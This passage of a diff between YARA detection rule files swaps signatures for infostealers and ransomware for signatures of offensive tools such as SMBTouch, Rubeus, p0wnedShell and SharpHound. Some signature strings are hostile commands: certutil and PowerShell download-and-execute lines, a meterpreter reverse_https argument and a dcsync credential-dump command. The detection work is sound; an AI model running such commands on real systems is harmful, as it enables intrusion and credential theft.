-		$s12 = "CreateGrabberZipPath" fullword ascii
-		$s13 = "Jester" fullword ascii
-		$s14 = /Stealer\.(Recovery|Grabber|Investigation)\./ ascii
+		$s1 = "certutil.exe -urlcache -split -f AAAAA BBBBB & cmd.exe /c BBBBB" ascii
+		$s2 = "powershell (new-object System.Net.WebClient).DownloadFile('AAAAA','BBBBB')" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule DITEKSHEN_MALWARE_Win_Soranostealer : FILE
+rule DITEKSHEN_INDICATOR_TOOL_SCN_Smbtouch : FILE
 {
 	meta:
-		description = "Detects SoranoStealer / HogGrabber. Available on Github: /Alexuiop1337/SoranoStealer"
+		description = "Detects SMBTouch scanner EternalBlue, EternalChampion, EternalRomance, EternalSynergy"
 		author = "ditekSHen"
-		id = "2fc40a73-5f28-5b5c-938a-35e8336e1d11"
+		id = "4e8176dd-4113-5fa8-a695-77e7169f6975"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9419-L9443"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L376-L400"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "27c9d6bf3f40f3d41c35975e856671fafcd4a0a8143b3bcbdff61c1fb28a37ab"
+		logic_hash = "78c2a435762d3febe927eb15910d5a18c1ffe74604673463543d3c859f5ef8e9"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "OiCuntJollyGoodDayYeHavin_" ascii
-		$x2 = { 00 56 4d 50 72 6f 74 65 63 74 00 52 65 61 63 74
-                6f 72 00 64 65 34 66 75 63 6b 79 6f 75 00 42 61
-                62 65 6c 4f 62 66 75 73 63 61 74 6f 72 41 74 74
-                72 69 62 75 74 65 00 43 72 79 74 70 6f 4f 62 66
-                75 73 63 61 74 6f 72 00 }
-		$x3 = { 00 4f 62 66 75 73 63 61 74 65 64 42 79 47 6f 6c
-                69 61 74 68 00 42 65 64 73 2d 50 72 6f 74 6f 72 00 }
-		$s1 = ".Binaries.whysosad" ascii
-		$s2 = "Adminstrator permissons are required" wide
-		$s3 = "12:03:33:4A:04:AF" fullword wide
-		$s4 = "RemoveEXE" fullword ascii
-		$s5 = "$340becfa-1688-4c32-aa49-30fdb4005e4b" fullword ascii
-		$s6 = "$99cffbcc-6ad7-4d32-bd1f-450967cf4a6b" fullword ascii
-		$s7 = "\"cam\": " ascii
-		$s8 = " - 801858595527371999762718088" fullword ascii
-		$s9 = "  - 96188142294460126639341306" fullword ascii
+		$s1 = "[+] SMB Touch started" fullword ascii
+		$s2 = "[-] Could not connect to share (0x%08X - %s)" fullword ascii
+		$s3 = "[!] Target could be either SP%d or SP%d," fullword ascii
+		$s4 = "[!] for these SMB exploits they are equivalent" fullword ascii
+		$s5 = "[+] Target is vulnerable to %d exploit%s" fullword ascii
+		$s6 = "[+] Touch completed successfully" fullword ascii
+		$s7 = "Network error while determining exploitability" fullword ascii
+		$s8 = "Named pipe or share required for exploit" fullword ascii
+		$w1 = "UsingNbt" fullword ascii
+		$w2 = "TargetPort" fullword ascii
+		$w3 = "TargetIp" fullword ascii
+		$w4 = "RedirectedTargetPort" fullword ascii
+		$w5 = "RedirectedTargetIp" fullword ascii
+		$w6 = "NtlmHash" fullword ascii
+		$w7 = "\\PIPE\\LANMAN" fullword ascii
+		$w8 = "UserRejected: " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 2 of ( $x* ) and 3 of ( $s* ) ) or 5 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $s* ) or all of ( $w* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Gloomanestealer : FILE
+rule DITEKSHEN_INDICATOR_TOOL_SCN_Nbtscan : FILE
 {
 	meta:
-		description = "Detects GloomaneStealer"
+		description = "Detects NBTScan scanner for open NETBIOS nameservers on a local or remote TCP/IP network"
 		author = "ditekSHen"
-		id = "6e3c7e8f-4b75-5198-aa41-076f29aac227"
+		id = "663c324e-4784-5efe-bbdf-60fa42e13944"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9445-L9461"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L402-L420"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "36aa9f863efb8172ed6449932169e6cb26cdeedd84bc734e09a8116a9c7774ac"
+		logic_hash = "a81b95ad60aac4d66586ae7dc61f6bcbe2b7185b66b2bb895f45abff3ad3f430"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "=GLOOMANE STEALER=" wide
-		$x2 = "Maded by GLOOMANE" wide
-		$s1 = "\\44CALIBER" ascii
-		$s2 = "Ethernet()" fullword wide
-		$s3 = ":spy: NEW LOG FROM" wide
-		$s4 = ":eye: IP:" wide
-		$s5 = ":file_folder: Grabbed Files" wide
-		$s6 = "$ebc25cf6-9120-4283-b972-0e5520d0000C" fullword ascii
-		$s7 = "$3b0e2d3d-3d66-42bb-8f9c-d6e188f359ae" fullword ascii
+		$s1 = "[%s] is an invalid target (bad IP/hostname)" fullword ascii
+		$s2 = "ERROR: no parse for %s -- %s" fullword ascii
+		$s3 = "add_target failed" fullword ascii
+		$s4 = "   -p <n>    bind to UDP Port <n> (default=%d)" fullword ascii
+		$s5 = "process_response.c" fullword ascii
+		$s6 = "currTarget != 0" fullword ascii
+		$s7 = "parse_target.c" fullword ascii
+		$s8 = "dump_packet.c" fullword ascii
+		$s9 = "parse_target_cb.c" fullword ascii
+		$s10 = "DUMP OF PACKET" fullword ascii
+		$s11 = "lookup_hostname.c" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or 5 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and 10 of ( $s* )
 }
-rule DITEKSHEN_MALWARE_Win_Lockdown : FILE
+rule DITEKSHEN_INDICATOR_TOOL_ENC_Bestcrypt : FILE
 {
 	meta:
-		description = "Detects Lockdown / cantopen ransomware"
+		description = "Detects BestEncrypt commercial disk encryption and wiping software"
 		author = "ditekSHen"
-		id = "793df99d-016a-5f96-9ff9-76d3f08e0dd2"
+		id = "30c3c17c-c951-5b14-80ba-eec7b2195985"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9463-L9476"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L442-L453"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a9bc2f514730703f3edf78a61f1bc357eee12b3289fc7491197c3b885286ca7e"
+		logic_hash = "77d338c6f3e4b733cb31eb1ae05e4ce8631812f7161bc70074a3fe1dee9df770"
 		score = 75
-		quality = 73
+		quality = 50
 		tags = "FILE"
 
 	strings:
-		$s1 = "BgIAAACkAABSU0E" wide
-		$s2 = ".cantopen" fullword wide
-		$s3 = "\\HELP_DECRYPT_YOUR_FILES.txt" wide
-		$s4 = "SALT" fullword wide
-		$s5 = "$4e677664-9a63-458e-a365-deb792509557" fullword ascii
-		$s6 = "CreateEncryptor" fullword ascii
+		$s1 = "BestCrypt Volume Encryption" wide
+		$s2 = "BCWipe for " wide
+		$s3 = "Software\\Jetico\\BestCrypt" wide
+		$s4 = "%c:\\EFI\\Jetico\\" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_MALWARE_Win_Unamedstealer : FILE
+rule DITEKSHEN_INDICATOR_TOOL_CNC_Earthworm : FILE
 {
 	meta:
-		description = "Detects unknown infostealer. Observed as 2nd stage and injects into .NET AppLaunch.exe"
+		description = "Detects Earthworm C&C Windows/macOS tool"
 		author = "ditekSHen"
-		id = "cb3d575b-3d53-5b89-abc1-3b3857ec9f46"
+		id = "4a6edcf3-b3c4-5620-8eac-102b1ce425f8"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9478-L9494"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L455-L471"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "84f4ac7489a0d522763f69ce55f816642a8511dc4b9698ce47c983020a2b7bea"
+		logic_hash = "5045faaaa9e60d4bd506240d51ff78dad4e89ccee0e824e7e5c309a8d3ae2883"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 
 	strings:
-		$s1 = "HideMelt" fullword ascii
-		$s2 = ".Implant" ascii
-		$s3 = "SetUseragent" fullword ascii
-		$s4 = "SendReport" fullword ascii
-		$s5 = "cookiesList" fullword ascii
-		$s6 = "WriteAppsList" fullword ascii
-		$s7 = "Timeout /T 2 /Nobreak" fullword wide
-		$s8 = "Directory not exists" wide
-		$s9 = "### {0} ### ({1})" wide
+		$s1 = "lcx_tran 0.0.0.0:%d <--[%4d usec]--> %s:%d" fullword ascii
+		$s2 = "ssocksd 0.0.0.0:%d <--[%4d usec]--> socks server" fullword ascii
+		$s3 = "rcsocks 0.0.0.0:%d <--[%4d usec]--> 0.0.0.0:%d" fullword ascii
+		$s4 = "rssocks %s:%d <--[%4d usec]--> socks server" fullword ascii
+		$s5 = "--> %3d <-- (close)used/unused  %d/%d" fullword ascii
+		$s6 = "<-- %3d --> (open)used/unused  %d/%d" fullword ascii
+		$s7 = "--> %d start server" ascii
+		$s8 = "Error on connect %s:%d [proto_init_cmd_rcsocket]" fullword ascii
+		$url = "http://rootkiter.com/EarthWrom/" nocase fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		( uint16( 0 ) == 0xfacf or uint16( 0 ) == 0x5a4d ) and ( 5 of ( $s* ) or $url )
 }
-
-rule DITEKSHEN_MALWARE_Win_Zxshell_Loader : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Keychaindumper : FILE
 {
 	meta:
-		description = "Detects ZXShell kernel driver loader"
+		description = "Detects macOS certificate/password keychain dumping tool"
 		author = "ditekSHen"
-		id = "c55c718b-6af3-5d3b-aa1c-369319fca603"
+		id = "cec094fa-c651-58a6-a306-f16d8603e536"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9496-L9544"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L473-L484"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b20350af231e0c329423c71d8f099305ed447d2ffcb7a533b7531dc9f5357b93"
+		logic_hash = "f606bdd5dba2180ffc552c46373b52801a0bd65a538b381fb9f4240efc5bd458"
 		score = 75
-		quality = 57
+		quality = 71
 		tags = "FILE"
-		hash1 = "a6020794bd6749e0765966cd65ca6d5511581f47cc2b38e41cb1e7fddaa0b221"
+		clamav_sig = "INDICATOR_Osx.Tool.PWS.KeychainDumper"
 
 	strings:
-		$s1 = "KillAvpProcess" ascii wide nocase
-		$s2 = "ProtectDllFile" ascii wide nocase
-		$s3 = "LoadSys" ascii wide nocase
-		$s4 = "CallDriver" ascii wide nocase
-		$s5 = "DoRVA" fullword ascii wide
-		$s6 = "TdiProxy" ascii
-		$s7 = "res.ini" fullword ascii
-		$s8 = "res.dat" fullword ascii
-		$s9 = "google64.p" fullword ascii
-		$s10 = "google32.p" fullword ascii
-		$s11 = "OneSelfKey" fullword ascii
-		$x1 = "antiscan" ascii
-		$x2 = "removeprocessnotify" ascii
-		$x3 = "setprocessnotify" ascii
-		$x4 = "antiantigp" ascii
-		$x5 = "hideproc" ascii
-		$x6 = "hidekey" ascii
-		$x7 = "hidefile" ascii
-		$x8 = "sc create %s binpath= \"%%SystemRoot%%\\System32\\svchost.exe -k %s\" type= share start= auto" fullword ascii
-		$m1 = "St4rtServ1ce" ascii
-		$m2 = "ch3ck dr1ver failed" ascii
-		$m3 = "L0ad dr1ver failed" ascii
-		$m4 = "Write Dr1ver Failed" ascii
-		$m5 = "over writed succ3ssfully" ascii
-		$m6 = "can k1ll the pr0cessId" ascii
+		$s1 = "_getEmptyKeychainItemString" fullword ascii
+		$s2 = "NdumpKeychainEntitlements" fullword ascii
+		$s3 = "_dumpKeychainEntitlements" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $m* ) or 5 of ( $s* ) or 5 of ( $x* ) or ( 3 of ( $s* ) and 3 of ( $x* ) ) or ( 2 of ( $s* ) and 1 of ( $x* ) and 1 of ( $m* ) ) or ( pe.exports ( "KillAvpProcess" ) and pe.exports ( "ProtectDllFile" ) and pe.exports ( "LoadSys" ) ) or ( 3 of them and ( pe.exports ( "KillAvpProcess" ) or pe.exports ( "ProtectDllFile" ) or pe.exports ( "LoadSys" ) or pe.exports ( "CallDriver" ) or pe.exports ( "DoRVA" ) ) ) )
+		( uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf ) and all of them
 }
-rule DITEKSHEN_MALWARE_Win_Bandit : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PET_P0Wnedshell : FILE
 {
 	meta:
-		description = "Detects Bandit Infostealer"
+		description = "Detects compiled executables of p0wnedShell post-exploitation toolkit"
 		author = "ditekSHen"
-		id = "06866232-bd40-5bbc-9f08-3892193b5f36"
+		id = "7df8f9b4-48d3-5271-9d60-5dd4bfaed316"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9546-L9582"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L486-L512"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e557f5a928b5da90f3ec878d6d8615a2d8b5f33e97954cd3278044f76b543386"
+		logic_hash = "9745b69573bf695fdada122143fb1889a7b2025250b5fb1e8f1a86b3be6f27d3"
 		score = 75
-		quality = 32
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "@Banditshopbot" ascii
-		$x2 = "BANDIT STEALER" ascii
-		$x3 = "Banditstealer" ascii
-		$n1 = "bandit/browsers." ascii
-		$n2 = "bandit/crypto." ascii
-		$n3 = "bandit/decrypt." ascii
-		$n4 = "bandit/messenger." ascii
-		$n5 = "bandit/userdata." ascii
-		$n6 = "bandit/utils." ascii
-		$f1 = "main.sendZipToTelegram" fullword ascii
-		$f2 = "main.killProcessHoldingFileHandle" fullword ascii
-		$f3 = "main.killProcessByName" fullword ascii
-		$f4 = "main.killProcessesHoldingFile" fullword ascii
-		$f5 = "main.deleteDir" fullword ascii
-		$f6 = "main.deleteUserDataDirs" fullword ascii
-		$path = /bandit\/(browsers|common|crypto|messenger|userdata|utils)\/(browsers|common|crypto|messenger|userdata|utils)\.go/ ascii
-		$m1 = "banditbot" ascii wide nocase
-		$m2 = "blackListedIPS = [" ascii wide nocase
-		$m3 = "blackListedPCNames = [" ascii wide nocase
-		$m4 = "blackListedMacs = [" ascii wide nocase
-		$m5 = "blacklisted_hwids = [" ascii wide nocase
-		$m6 = "blacklisted_users = [" ascii wide nocase
-		$m7 = "blacklisted_processes = [" ascii wide nocase
-		$s1 = "User-AgentVirtualBox" ascii
-		$s2 = "%s%sBinanceChainWallet" ascii
-		$s3 = "coinbaseWalletcontent-lengthdata" ascii
-		$s4 = "coinbaseWalletExtensioncommand" ascii
-		$s5 = "\\s+pid:\\s+(\\d+)\\s+" ascii
-		$s6 = "/user:Administrator" ascii
+		$s1 = "Use WinRM, PsExec, SMB/WMI to execute commands on remote systems" wide
+		$s2 = "-CreateProcess \"cmd.exe\" -Username \"nt authority\\system\"" wide
+		$s3 = "-Command '\"lsadump::dcsync /user:" wide
+		$s4 = "-Payload windows/meterpreter/reverse_https -Lhost" wide
+		$s5 = "Get-Content ./EncodedPayload.bat" fullword wide
+		$e1 = "OnYNAB+LCAAAAAAABAC8vOeS60iSLvh75yly+rZZVxuqC4KQs3uvLQhFEJIACALoHVuD1oKQBMbuuy+Y4pw8dUTf3R+bZlWVZHh87uHh4vPItv63ZGrCMW+bF7GZ2zL+" wide
+		$e2 = "kuIeAB+LCAAAAAAABADsvWt327iuMPw9v0Jv27Wa7DqJc2ma5nl71vZFTpzx/ZJL+3TlyLZiq7EtjyTHcffZ//0BSEqiKEqWbKczs8941qS2LgAIAiAIguDjfNp3DHOq" wide
+		$e3 = "mZYIAB+LCAAAAAAABADsvflj2zyOMPx7/gptmnftbBIfuZp0t/OOfMZp7PjO0adfX9lSbCWy5Vp2HGfm+d8/ACQl6vCRNp2Z3bVmnioWSRAEQQAESfC/Pmwp8FTtmTFu" wide
+		$e4 = "u9YGAB+LCAAAAAAABADsvW1D40ayKPw9v0Lr4V7ZE8vY5mUY9rKJBzMTnmWAgyGTvYTlCluAdmzJK9nDsEn++1NV/S61ZJmXZJIN52wG7O7q6urq6qrqquoXSfDveZgE" wide
+		$e5 = "T3gDAB+LCAAAAAAABADtvX1f2zq2KPz3yafQzuZcwi5JEydQ2nM7v4cCnc0zQLmE7j3z6+7NmMQBnwY7YzsFTqff/WpJsi3Jki07DlA2mT008ctaS0tL601L0nThjSPX" wide
+		$e6 = "zRgDAB+LCAAAAAAABADtfW1327jR6OdHv4Kr9TmWdiVZkl+SdZs913Gcrm9tx7WcbvekuS4t0TYbiVRJKYmfbf77xeCNeCVBinKcbNStI5HAYDAYDAaDwczNMhovwjjy" wide
+		$e7 = "pxICAB+LCAAAAAAABADtvf17GkeyKPyz+Cvmlfw+ggRhfcXr1X1znsUIx5yVhC7IUbI+fnUHGKRZwww7M1jWyeZ/v1XV3z09wABysnviZ1cBpqe6urqquqq6uno8j4ZZ" wide
+		$e8 = "H4sIAAAAAAAEANy9e3wTVfo4PG1SmkLbCdpgFdSgUeuCbLTAthYk005gQhNahUIVkCqIqKi1TaAuIGBaJRzG27Kuul5wV3fV1fUuUFxNKbTl3oJAuaiouE4paAGBFpB5" wide
+		$k1 = "EasySystemPPID" fullword ascii
+		$k2 = "EasySystemShell" fullword ascii
+		$k3 = "LatMovement" fullword ascii
+		$k4 = "ListenerURL" fullword ascii
+		$k5 = "MeterStager" fullword ascii
+		$k6 = "PatchEventLog" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 4 of ( $n* ) or 5 of ( $f* ) or ( $path and ( 1 of ( $n* ) or 1 of ( $f* ) ) ) or ( 1 of ( $x* ) and ( 1 of ( $n* ) or 1 of ( $f2* ) ) ) or 6 of ( $m* ) or ( all of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or 7 of ( $e* ) or all of ( $k* ) or ( 2 of ( $s* ) and 2 of ( $e* ) and 2 of ( $k* ) ) )
 }
-rule DITEKSHEN_MALWARE_Win_Laplas : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Rubeus : FILE
 {
 	meta:
-		description = "Detects LapLas Infostealer"
+		description = "Detects Rubeus kerberos defensive/offensive toolset"
 		author = "ditekSHen"
-		id = "bf2b0183-2b21-535a-896c-250fa448d090"
+		id = "5af8cee0-e664-5dfe-9932-0e74ed41b6b4"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9584-L9612"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L514-L531"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e4a1f39a539782118db9c4ab89d03e359420397ef970165389cc79e7ea0952b3"
+		logic_hash = "ee817d23427970d7e77f9ce2a7cbc25c77177d81354fed83e7551cdcbc2d7cd2"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
-		clamav_sig1 = "MALWARE.Win.LapLas-DotNET"
-		clamav_sig2 = "MALWARE.Win.LapLas-GoLang"
 
 	strings:
-		$c1 = "/bot/" ascii
-		$c2 = "key=" ascii
-		$f1 = "main.isRunning" fullword ascii
-		$f2 = "main.writePid" fullword ascii
-		$f3 = "main.isStartupEnabled" fullword ascii
-		$f4 = "main.enableStartup" fullword ascii
-		$f5 = "main.waitOpenClipboard" fullword ascii
-		$f6 = "main.clipboardWrite" fullword ascii
-		$f7 = "main.setOnline" fullword ascii
-		$f8 = "main.getRegex" fullword ascii
-		$v2_1 = "{0}/bot/{1}?{2}" wide
-		$v2_2 = /\{0\}\\\{1\}\.(exe|pid)/ wide
-		$v2_3 = "schtasks /create /tn" wide
-		$v2_4 = "SetOnline" fullword ascii
-		$v2_5 = "IsAutoRunInstance" fullword ascii
-		$v2_6 = "GetNewAddress" fullword ascii
-		$v2_7 = "RefreshRegex" fullword ascii
+		$s1 = "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" fullword wide
+		$s2 = "(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))" fullword wide
+		$s3 = "rc4opsec" fullword wide
+		$s4 = "pwdlastset" fullword wide
+		$s5 = "LsaEnumerateLogonSessions" fullword ascii
+		$s6 = "extractKerberoastHash" fullword ascii
+		$s7 = "ComputeAllKerberosPasswordHashes" fullword ascii
+		$s8 = "kerberoastDomain" fullword ascii
+		$s9 = "GetUsernamePasswordTGT" fullword ascii
+		$s10 = "WriteUserPasswordToFile" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $c* ) and 5 of ( $f* ) ) or ( 1 of ( $c* ) and 7 of ( $f* ) ) or ( 6 of ( $v2* ) ) )
+		uint16( 0 ) == 0x5a4d and 8 of them
 }
-rule DITEKSHEN_MALWARE_Win_Mystic : FILE
+rule DITEKSHEN_INDICATOR_TOOL_RTK_Hiddenrootkit : FILE
 {
 	meta:
-		description = "Hunt for Mystic Infostealer"
+		description = "Detects the Hidden public rootkit"
 		author = "ditekSHen"
-		id = "959eceab-0a2c-5361-b8f4-6739033ffae5"
+		id = "c9e9d160-224f-505f-a135-56a9793f99c2"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9614-L9628"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L533-L554"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "26e0b85141df818d70124c0b19b5b6a05ac24ae679724d7a8ad94415a6462d17"
+		logic_hash = "20180fc040c1b988b17b1ca9b61a7dab5180df4961a00f0afcb03e2cbe99b28f"
 		score = 75
 		quality = 50
 		tags = "FILE"
 
 	strings:
-		$s1 = "LaStFiLe:)" ascii wide
-		$s2 = "LaStPrOcEsS:)" ascii wide
-		$s3 = "credit_cards" ascii wide
-		$s4 = "number_of_processors" ascii wide
-		$s5 = "computername" ascii wide
-		$p1 = "G:\\Projects\\Python\\morpher\\" ascii wide
-		$p2 = /G:\\Projects\\stealer\\.{15}\\Release\\.{5,25}\.pdb/ ascii wide
+		$h1 = "Hid_State" fullword wide
+		$h2 = "Hid_StealthMode" fullword wide
+		$h3 = "Hid_HideFsDirs" fullword wide
+		$h4 = "Hid_HideFsFiles" fullword wide
+		$h5 = "Hid_HideRegKeys" fullword wide
+		$h6 = "Hid_HideRegValues" fullword wide
+		$h7 = "Hid_IgnoredImages" fullword wide
+		$h8 = "Hid_ProtectedImages" fullword wide
+		$s1 = "FLTMGR.SYS" fullword ascii
+		$s2 = "HAL.dll" fullword ascii
+		$s3 = "\\SystemRoot\\System32\\csrss.exe" fullword wide
+		$s4 = "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\%wZ" fullword wide
+		$s5 = "INIT" fullword ascii
+		$s6 = "\\hidden-master\\Debug\\QAssist.pdb" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( 1 of ( $p* ) and 3 of ( $s* ) ) ) ) or ( all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $h* ) or 5 of ( $s* ) or ( 2 of ( $s* ) and 2 of ( $h* ) ) )
 }
-rule DITEKSHEN_MALWARE_Linux_Buhti : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PET_Sharphound : FILE
 {
 	meta:
-		description = "Detects Buhti Ransomware"
+		description = "Detects BloodHound"
 		author = "ditekSHen"
-		id = "a50b8c34-e9e2-5466-80a1-b0ab805c68be"
+		id = "d8f44e15-3e7c-5e5d-9d74-30c61e679fcb"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9630-L9643"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L556-L573"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1bab3202dbeaf088b233c3ab1056c357d156b7eef3111bea997b1c610a27f561"
+		logic_hash = "bdf10d0aabd6c41e8dd1f87c0fa141f300d785146d059fcd301ec35f65fbe990"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
 
 	strings:
-		$x1 = "buhtiRansom" ascii
-		$x2 = "://satoshidisk.com/pay/" ascii
-		$s1 = "main.encrypt_file" fullword ascii
-		$s2 = "/path/to/be/encrypted" ascii
-		$s3 = "Restore-My-Files.txt" ascii
-		$s4 = ".buhti390625" ascii
+		$id1 = "InvokeBloodHound" fullword ascii
+		$id2 = "Sharphound" ascii nocase
+		$s1 = "SamServerExecute" fullword ascii
+		$s2 = "get_RemoteDesktopUsers" fullword ascii
+		$s3 = "commandline.dll.compressed" ascii wide
+		$s4 = "operatingsystemservicepack" fullword wide
+		$s5 = "LDAP://" fullword wide
+		$s6 = "wkui1_logon_domain" fullword ascii
+		$s7 = "GpoProps" fullword ascii
+		$s8 = "a517a8de-5834-411d-abda-2d0e1766539c" fullword ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x457f and ( all of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or 5 of them )
+		uint16( 0 ) == 0x5a4d and ( all of ( $id* ) or 6 of ( $s* ) or ( 1 of ( $id* ) and 4 of ( $s* ) ) )
 }
-rule DITEKSHEN_MALWARE_Win_Commonmagic : FILE
+rule DITEKSHEN_INDICATOR_TOOL_UAC_NSISUAC : FILE
 {
 	meta:
-		description = "Detects CommonMagic and Modules"
+		description = "Detects NSIS UAC plugin"
 		author = "ditekSHen"
-		id = "cbebe334-9b66-5931-8f92-25d080f7fd6a"
+		id = "4a7c20f6-bf0e-55fb-a0b9-7b51e4af7cd3"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9645-L9660"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L575-L587"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e94ba53f31f3effe12b1fbaca19fea59c0e12f742f6fc0af2a0a679bf4299cbe"
+		logic_hash = "48c0247c789328a0ff62816f5d6ecac7a0f2a3fe2cb95d99c0e7d988147f7137"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$p1 = "\\\\.\\pipe\\PipeMd" wide
-		$p2 = "\\\\.\\pipe\\PipeCrDtMd" wide
